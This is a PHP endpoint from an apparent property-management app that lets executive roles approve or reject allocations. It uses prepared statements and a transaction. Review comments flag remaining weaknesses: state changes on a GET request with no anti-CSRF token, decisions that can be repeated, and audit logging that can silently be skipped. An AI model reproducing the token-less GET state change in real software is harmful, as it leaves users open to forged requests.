
Current File : /home/u390967363/domains/aibenproperties.com/public_html/app/exec-approve-allocation.php
<?php
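// Bootstrap: make sure a session is active, then load the shared includes.
// NOTE(review): $pdo is used further down without being defined in this file,
// so it is presumably created by includes/db.php — confirm.
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}
require_once __DIR__ . '/includes/db.php';
require_once __DIR__ . '/includes/functions.php';

// Authorisation gate: only the two executive roles may approve or reject.
// Strict comparison matters here: with loose in_array() a non-string session
// value such as boolean true compares equal to any non-empty role name.
$role = $_SESSION['user_role'] ?? '';
if (!in_array($role, ['chairman_ceo', 'super_admin'], true)) {
    header("Location: dashboard.php");
    exit;
}

// NOTE(review): this endpoint changes state on a plain GET request and no
// anti-CSRF token is checked in the visible code, so any page the executive
// visits while logged in could trigger an approval. Moving the action to POST
// with a per-session token would need matching changes in the dashboard links,
// which are not visible here.
$action = $_GET['action'] ?? '';

// FILTER_VALIDATE_INT rejects arrays and strings with trailing garbage; a bare
// (int) cast would turn ?id[]=x into 1 and "5abc" into 5.
$id = filter_var($_GET['id'] ?? null, FILTER_VALIDATE_INT);
if ($id === false) {
    $id = 0;
}

if ($id <= 0 || !in_array($action, ['approve', 'reject'], true)) {
    header("Location: executive-dashboard.php?notice=" . urlencode("Invalid request") . "&type=danger");
    exit;
}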

/**
 * Report whether a column exists on a table of the currently selected database.
 *
 * The lookup goes through INFORMATION_SCHEMA.COLUMNS with both names bound as
 * parameters. Any Exception raised while preparing, executing or fetching is
 * treated as "column not present" instead of being propagated.
 *
 * @param PDO    $pdo   Open connection to query.
 * @param string $table Table name to inspect.
 * @param string $col   Column name to look for.
 * @return bool True when the lookup returns a truthy column name, false otherwise.
 */
function table_has_column(PDO $pdo, string $table, string $col): bool {
    $lookup = "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = DATABASE() AND TABLE_NAME = ? AND COLUMN_NAME = ?";

    try {
        $query = $pdo->prepare($lookup);
        $query->execute([$table, $col]);
        $found = $query->fetchColumn();
    } catch (Exception $e) {
        // Best-effort probe: a failed lookup is reported as "no such column".
        return false;
    }

    // fetchColumn() yields the column name on a hit and false on a miss.
    return (bool)$found;
}

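// Apply the decision and, where the schema supports it, record who made it.
// Everything runs in one transaction so the status change and its audit entry
// are committed together or not at all.
try {
    $pdo->beginTransaction();

    // Confirm the allocation exists before reporting success or writing an
    // audit entry; an UPDATE that matches no row does not raise an error.
    // FOR UPDATE keeps the row locked until the transaction ends.
    $check = $pdo->prepare("SELECT id FROM allocations WHERE id = ? FOR UPDATE");
    $check->execute([$id]);
    if ($check->fetchColumn() === false) {
        $pdo->rollBack();
        header("Location: executive-dashboard.php?notice=" . urlencode('Allocation not found') . "&type=danger");
        exit;
    }

    // NOTE(review): the current status is not inspected, so an allocation that
    // was already approved or rejected can be decided again. Whether that is
    // intended cannot be told from this file — confirm against the workflow.
    $newStatus = $action === 'approve' ? 'approved' : 'rejected';
    $actorId = $_SESSION['user_id'] ?? null;

    // The SET clause is assembled from fixed fragments only; every value is bound.
    $sql = "UPDATE allocations SET status = ?, updated_at = CURRENT_TIMESTAMP";
    $params = [$newStatus];

    // approved_by / approved_at are optional columns and only written on approval.
    $hasApprovedBy = table_has_column($pdo, 'allocations', 'approved_by');
    $hasApprovedAt = table_has_column($pdo, 'allocations', 'approved_at');
    if ($newStatus === 'approved') {
        if ($hasApprovedBy) {
            $sql .= ", approved_by = ?";
            $params[] = $actorId;
        }
        if ($hasApprovedAt) {
            $sql .= ", approved_at = CURRENT_TIMESTAMP";
        }
    }
    $sql .= " WHERE id = ?";
    $params[] = $id;
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);

    // Optional audit trail: written only when activity_logs has the expected
    // columns. table_has_column() already converts lookup failures to false.
    // NOTE(review): when those columns are missing the decision leaves no audit
    // record at all — confirm that is acceptable for executive approvals.
    $hasLog = table_has_column($pdo, 'activity_logs', 'entity_type')
        && table_has_column($pdo, 'activity_logs', 'entity_id')
        && table_has_column($pdo, 'activity_logs', 'action');
    if ($hasLog) {
        $stmt = $pdo->prepare("INSERT INTO activity_logs (entity_type, entity_id, action, user_id, created_at) VALUES ('allocation', ?, ?, ?, CURRENT_TIMESTAMP)");
        $stmt->execute([$id, $newStatus, $actorId]);
    }

    $pdo->commit();
    $msg = $action === 'approve' ? 'Allocation approved' : 'Allocation rejected';
    header("Location: executive-dashboard.php?notice=" . urlencode($msg) . "&type=success");
    exit;
} catch (Exception $e) {
    if ($pdo->inTransaction()) {
        $pdo->rollBack();
    }
    // Keep the cause in the server log; the user only sees a generic notice.
    error_log('exec-approve-allocation: ' . $action . ' of allocation ' . $id . ' failed: ' . $e->getMessage());
    header("Location: executive-dashboard.php?notice=" . urlencode('Action failed') . "&type=danger");
    exit;
}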
?>
